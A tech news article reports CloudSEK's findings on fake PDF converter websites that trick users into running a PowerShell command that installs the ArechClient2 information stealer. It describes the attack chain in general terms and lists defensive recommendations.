This Fake PDF Converter Is Stealing Your Data with Malware

There’s new malware on the market that impersonates a file converter but, in reality, steals data. According to researchers at CloudSEK, a new malware campaign uses fake online PDF conversion tools to trick users into installing a powerful information stealer known as ArechClient2.

This comes after the public alert issued by the FBI’s Denver office, which warned of malicious online file converters being used to deliver malware. So, let’s take a closer look at how this malware works and what you can do to stay safe from it.

Which Websites Are Involved?

If we look at CloudSEK’s report, attackers have set up deceptive websites called candyxpdf[.]com and candyconverterpdf[.]com. These websites closely resemble the popular pdfcandy.com tool, which is a real website used by millions of people daily.

Though the malicious sites are less popular, candyxpdf[.]com and candyconverterpdf[.]com are claimed to have had around 2,300 and 4,100 visits, respectively, in March 2025. Their activity signals a growing exploitation of high-traffic utilities for malware distribution.

How Does the Attack Work?

A user uploads a file for conversion.
The site shows a fake loading screen followed by a CAPTCHA.
The user is then prompted to run a PowerShell command.
This leads to downloading a ZIP file (adobe.zip) containing audiobit.exe.
Audiobit.exe uses the legitimate MSBuild.exe to run ArechClient2 malware.

Once active, the malware collects browser credentials, crypto wallet data, and other personal information.

How Are Users Being Tricked?

Attackers use exactly the same-looking websites and add realistic design elements like loading animations and CAPTCHA screens, which helps them appear authentic. However, the sudden prompt to run a PowerShell command, something regular users wouldn’t normally do, adds a sense of urgency and confusion that lowers their guard.

This campaign highlights how cybercriminals exploit everyday digital tools. By combining psychological manipulation with technical sophistication, attackers are turning routine tasks into entry points for data theft.
Varun Ajmera, Threat Intelligence Researcher at CloudSEK

What Can You Do to Stay Safe?

CloudSEK has issued the following recommendations for users and organizations:

Use verified tools from official sources for file conversions.
Avoid executing commands from unknown or suspicious websites.
Keep security tools updated, including antivirus and DNS filtering solutions.
Train users to recognize suspicious behaviors like unexpected CAPTCHAs or command-line instructions.
Use offline tools where possible to limit exposure to online threats.

Bottom Line

This is not new these days! More and more malware and scams are coming from attackers who try to adapt to common digital behaviors. With the use of realistic phishing tactics and abuse of trusted Windows tools, even routine tasks can lead to serious compromises. That’s why staying vigilant and only using trusted sources has become of utmost importance in today’s world.

Keval Vachharajani
Reporter
- LinkedIn
Keval Vachharajani is a seasoned business tech journalist with over five years of experience covering technology for renowned publications. Now, he brings his expertise to the dynamic world of B2B. At Geekflare, Keval focuses on uncovering the latest developments in SaaS, delivering in-depth news, analysis, and insights to empower businesses and professionals.